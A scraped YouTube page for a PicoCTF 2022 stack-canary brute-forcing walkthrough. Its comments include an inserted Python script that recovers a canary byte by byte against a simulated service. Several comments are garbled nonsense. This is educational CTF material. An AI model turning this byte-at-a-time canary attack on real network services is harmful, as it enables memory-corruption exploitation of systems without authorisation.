PWN - Bruteforcing Stack Canaries (PicoCTF 2022 #44 'buffer-overflow3')

25,213 views

John Hammond

2 years ago

(PS, jump into the HackTheBox Cyber Apocalypse CTF! j-h.io/htb-cyber-apocalypse2022)
Help the channel grow with a Like, Comment, & Subscribe!
❤️ Support ➡ j-h.io/patreon ↔ j-h.io/paypal ↔ j-h.io/buymeacoffee
Check out the affiliates below for more free or discounted learning!
🖥️ Zero-Point Security ➡ Certified Red Team Operator j-h.io/crto
💻Zero-Point Security ➡ C2 Development with C# j-h.io/c2dev
👨🏻‍💻7aSecurity ➡ Hacking Courses & Pentesting j-h.io/7asecurity
📗Humble Bundle ➡ j-h.io/humblebundle
🐶Snyk ➡ j-h.io/snyk
🌎Follow me! ➡ j-h.io/discord ↔ j-h.io/twitter ↔ j-h.io/linkedin ↔ j-h.io/instagram ↔ j-h.io/tiktok
📧Contact me! (I may be very slow to respond or completely unable to)
🤝Sponsorship Inquiries ➡ j-h.io/sponsorship
🚩 CTF Hosting Requests ➡ j-h.io/ctf
🎤 Speaking Requests ➡ j-h.io/speaking
💥 Malware Submission ➡ j-h.io/malware
❓ Everything Else ➡ j-h.io/etc

Comments: 64
@MrToast72 2 years ago
I've been watching all of your CTF videos for 2022 and dude, you do a fantastic job at explaining everything, even when you're dead tired at 1 in the morning you still take time to explain everything in detail. Thank you for making me fall in love with pen testing and cyber security even more than I already am! You go John! PS I did the KZfaq things 😉
@kevinwilson7213 1 year ago
Dude! Please do more of these. It is way more helpful to see you "bump around" (and thereby realize that you are human) than to just see you figure out complex problems in a millisecond and feel like a complete dummy when it takes me hours to figure out the same thing (if I ever do!). PLUS, we get to see your "debugging" process, which is super, super helpful. Thanks for the content as always.
@CrazedMachine 1 year ago
I appreciate watching the full process of figuring it out. A lot of videos just speed through things and I’m left thinking “how did you see that so quickly?” Watching you do your thing as is also teaches the problem solving process, which is just as important.
@logiciananimal 2 years ago
Great stuff! I'm finally getting to piece together what pwntools does. (I understand buffer overruns etc. fairly well, but these automated tools are new to me). What would be even better would be some sort of O'Reilly book or the like on it. (Yes, I'd even buy a dead tree edition.)
@edi33416 2 years ago
You can access the man pages of read with `man 2 read`. This is because read is a syscall, not a library function, so its docs are in section 2 of the manual. Section 3 is for libraries. Hope people will find it helpful. Keep up the great work!
@marcovalentinoalvarado3290 2 years ago
Interesting, thank you for sharing :)
@edi33416 2 years ago
@marcovalentinoalvarado3290 You're very welcome. If you want to find out more about the other sections of the manual, inspect the manual page of the manual itself (I know, Inception much?) with `man man`.
@moistgiraffe3574 1 year ago
This was a niche, BUT EXTREMELY helpful comment. I've been wondering for ages.
@yurilsaps 2 years ago
Great!!! Please never stop!!!!
@0root1 1 year ago
18:40 that offset variable was haunting me since the last two videos. Great video.
@SalmanKhan.78692 2 years ago
Great content, thanks sir for providing this type of knowledge 🔥🔥🔥
@LDowning0190 2 years ago
Great content as always. Thank you for sharing. I am learning a lot about Python.
@WhyCantIFindAname657 2 years ago
Great video, really learned a lot 👍
@sudoer92 2 years ago
You are the best dude, keep it up 🔥🔥🔥
@jacobfinder7476 2 years ago
John is a Genius!!!!
@sgtreckless5183 2 years ago
Ah, now we're getting into the interesting stuff!
@tpai302 2 years ago
And of course it’s another “banger” video.
@verolyn8459 2 years ago
First, looks like I'm gonna learn something new again..
@charlesnathansmith 11 months ago
Just a programming note: byte arrays are mutable, so you don't need to completely rebuild the payload every loop. You can just build it once with 4 random bytes for the canary, then when solving for the first byte just modify the payload[offset] byte and send off payload[:offset+1], then once that's found, loop through values for payload[offset+1] and send off payload[:offset+2], etc. It's more efficient, and you don't have to keep up with the values of the positions you've found so far because they're already saved correctly in the payload.
@tbremard 1 year ago
Hello my friend, at the start of the video you are struggling with sscanf; it seems to me that you didn't spot the two 's': sscanf is different from scanf. The first parameter of sscanf is a pointer to a buffer, which is called length in this instance; that's why your printf %d returns a random number, and it should be replaced by %p in order to be compliant with the type, which is a pointer. Thanks for all the rest.
@bhagyalakshmi1053 1 year ago
Concrete wall for you breaking information
@adamsiek6438 2 years ago
Happy KZfaq Comment~!
@bhagyalakshmi1053 1 year ago
Rdi ,RSI,rdx buf function using number
@bech2342 2 years ago
Next time try socat to serve the binary as a local service listening over TCP.
@ArSiddharth 2 years ago
Hey!
@bhagyalakshmi1053 1 year ago
Relying
@yajusgakhar6969 2 years ago
Should we attempt buffer overflow challenges without checking the source code?
@bhagyalakshmi1053 11 months ago
Library here
@ugurre 1 year ago
Can we somehow exploit the fact that the local stack canary is copied from a global variable instead of brute forcing (e.g. if the canary was less "brute-forceable")?
@depon91 2 years ago
Can you please have a go at a device called deeper connection Pico DPN (like VPN)? They are claiming that nobody can hack it. Since you are very creative I was wondering if you wanna have a go? Thank you, you're great 👍
@bhagyalakshmi1053 1 year ago
Value hai
@bhagyalakshmi1053 11 months ago
Rax,rex,rdx, 0x86?
@bhagyalakshmi1053 1 year ago
Sal , change?
@bhagyalakshmi1053 11 months ago
Malloc ?
@bhagyalakshmi1053 1 year ago
Canry 1,2vlun explain.
@Lukemagic01 1 year ago
My solution appears to work locally, but once I connect to the remote server the 'leaking canary values' are returned in hex ('\x03\x01\x01\x01') and I get a UnicodeDecodeError: "utf-8 codec can't decode byte 0x93 in position 25: invalid start byte". Any ideas why this is happening and how to resolve it? I've googled my brains out but can't figure it out.
@exosfear512 1 year ago
I think, due to the remote system being slightly different, \x03 is a bad char which will kick off the false 'Flag?'. Since this is a custom canary we can safely assume the four bytes of the canary are printable characters because it comes out of canary.txt. Instead of iterating bytes 1-255, 'from strings import printable' and then run 'for i in printable'.
@ugurre 1 year ago
@exosfear512 I agree that's probably the case, given PicoCTF is very cooperative with that sort of thing. But in reality that could be a big "gotcha!" because you could really name any kind of file anything (e.g. canary.txt could easily be a binary file).
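Putting charlesnathansmith's mutable-bytearray note and this printable-first thread together, here is an added example that runs offline against a constructed stand-in for the challenge service. It is not John's script and not the challenge's own code: `BUF_SIZE`, the sample canary values, the `make_service` stand-in and its reply strings are all constructed assumptions. It keeps every reply as bytes and tests for `b"Flag?"` instead of decoding, which is what avoids the UnicodeDecodeError reported above, and after the printable values it falls back to the full 0-255 range so a binary canary like the \x03\x01\x01\x01 seen on the remote box is still recovered.

```python
from string import printable

# Constructed simulation parameters (not values from the challenge or the video):
# BUF_SIZE is the number of bytes between the start of the overflowed buffer and
# the canary; CANARY_LEN matches the four-byte canary the comments discuss.
BUF_SIZE = 64
CANARY_LEN = 4


def make_service(canary: bytes):
    """Return a constructed stand-in for the challenge service.

    The real program reads its canary from canary.txt, so the value is the same
    on every connection; it lets the client write past the buffer and then
    compares the bytes sitting after the buffer with the stored canary.  Sending
    only BUF_SIZE + k bytes overwrites just the first k canary bytes and leaves
    the rest intact, so the check passes exactly when that k-byte prefix is
    right.  That per-byte yes/no answer is the oracle the search relies on.
    """
    def service(payload: bytes) -> bytes:
        written = payload[BUF_SIZE:BUF_SIZE + CANARY_LEN]
        if written == canary[:len(written)]:
            return b"Flag? "                        # check passed, program went on
        return b"*** stack smashing detected ***\n"  # constructed wording
    return service


class CountingOracle:
    """Wrap a service so the caller can see how many attempts the search needed."""

    def __init__(self, service):
        self.service = service
        self.calls = 0

    def __call__(self, payload: bytes) -> bytes:
        self.calls += 1
        return self.service(payload)


def candidate_order() -> list:
    """Printable byte values first (the challenge canary comes out of a text
    file), then every remaining value, so a binary canary is still recovered."""
    first = [ord(ch) for ch in printable]
    rest = [b for b in range(256) if b not in first]
    return first + rest


def recover_canary(oracle, offset: int = BUF_SIZE) -> bytes:
    """Byte-at-a-time search over a single mutable payload.

    The payload is built once; each position is overwritten in place and only
    the prefix up to that position is sent.  Replies stay bytes and are tested
    with a bytes literal, so a reply containing non-UTF-8 bytes never raises
    UnicodeDecodeError the way decode() would.
    """
    payload = bytearray(b"A" * offset + b"\x00" * CANARY_LEN)
    candidates = candidate_order()
    for i in range(CANARY_LEN):
        for value in candidates:
            payload[offset + i] = value             # mutate, don't rebuild
            reply = oracle(bytes(payload[:offset + i + 1]))
            if b"Flag?" in reply:
                break                               # byte i is now correct in place
        else:
            raise RuntimeError(f"no value accepted at canary byte {i}")
    return bytes(payload[offset:offset + CANARY_LEN])


if __name__ == "__main__":
    # Constructed sample canaries: one printable, one binary like the value
    # reported in the comments above.
    for sample in (b"WhMM", b"\x03\x01\x01\x01"):
        oracle = CountingOracle(make_service(sample))
        found = recover_canary(oracle)
        print(f"recovered {found!r} after {oracle.calls} attempts "
              f"(guessing all four bytes at once could take up to {256 ** CANARY_LEN})")
```

The attempt counter is the point of the exercise: because the service answers for one byte at a time, the search costs at most 4 × 256 attempts instead of up to 2^32, and it only works because the canary is identical on every attempt. That is the takeaway for anyone defending a service: glibc picks a fresh canary when a process starts, but a server that forks per connection hands the same canary to every child, and a file-backed canary like this challenge's is the extreme case. With pwntools the same bytes-only comparison applies, since `recv()` and `recvline()` already return bytes.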
@bhagyalakshmi1053 1 year ago
Rflag?
@bhagyalakshmi1053 1 year ago
Banck employees sylres nover coming.
@CashtynSomethingCool 1 year ago
Heyo
@prasadsawool6670 2 years ago
Yt algo bump
@bhagyalakshmi1053 1 year ago
Today is my eyes chemical to facing problem nover problem chemical to face 👀 not problem
@unutilisateurdeyoutube1256 1 year ago
Damn, my script works locally but somehow it doesn't work remotely. Could you please provide your source code to test? Thanks! :)))))
@FunkadelicFeed 1 year ago
Same for me, it's spitting out hex when bruteforcing the canary, and incorrect hex values at that. For me the canary is coming out as \x03\x01\x01\x01
@unutilisateurdeyoutube1256 1 year ago
@FunkadelicFeed lol, me too :D
@unutilisateurdeyoutube1256 1 year ago
@FunkadelicFeed Have you figured out why? I found a way to solve it though.
@FunkadelicFeed 1 year ago
@unutilisateurdeyoutube1256 Nah, I haven't been able to. What solution did you figure out?
@bhagyalakshmi1053 1 year ago
Conr vlu?
@bhagyalakshmi1053 1 year ago
Desc,asc date rood ing number attending time........
@AntonioSouza 2 years ago
@_JohnHammond you are amazing. I love your way and I have learned a lot from you. Thank you very much.
@bhagyalakshmi1053 1 year ago
Volume button purposes hi volume Exl,rop reply
@bhagyalakshmi1053 1 year ago
Jump number cinr
@bhagyalakshmi1053 11 months ago
Canary vuln report new video creation 🤦🤖
@bhagyalakshmi1053 1 year ago
Dive to ip address number dive files open remo light attending after again to everyone that red colour process signal to dry flowers
@bhagyalakshmi1053 1 year ago
Ato z
@bhagyalakshmi1053 1 year ago
Search ? number name
@bhagyalakshmi1053 1 year ago
Canr vilu number meine in
@bhagyalakshmi1053 1 year ago
DemJ vlyuu
@msasdc2087 2 years ago
Disgusting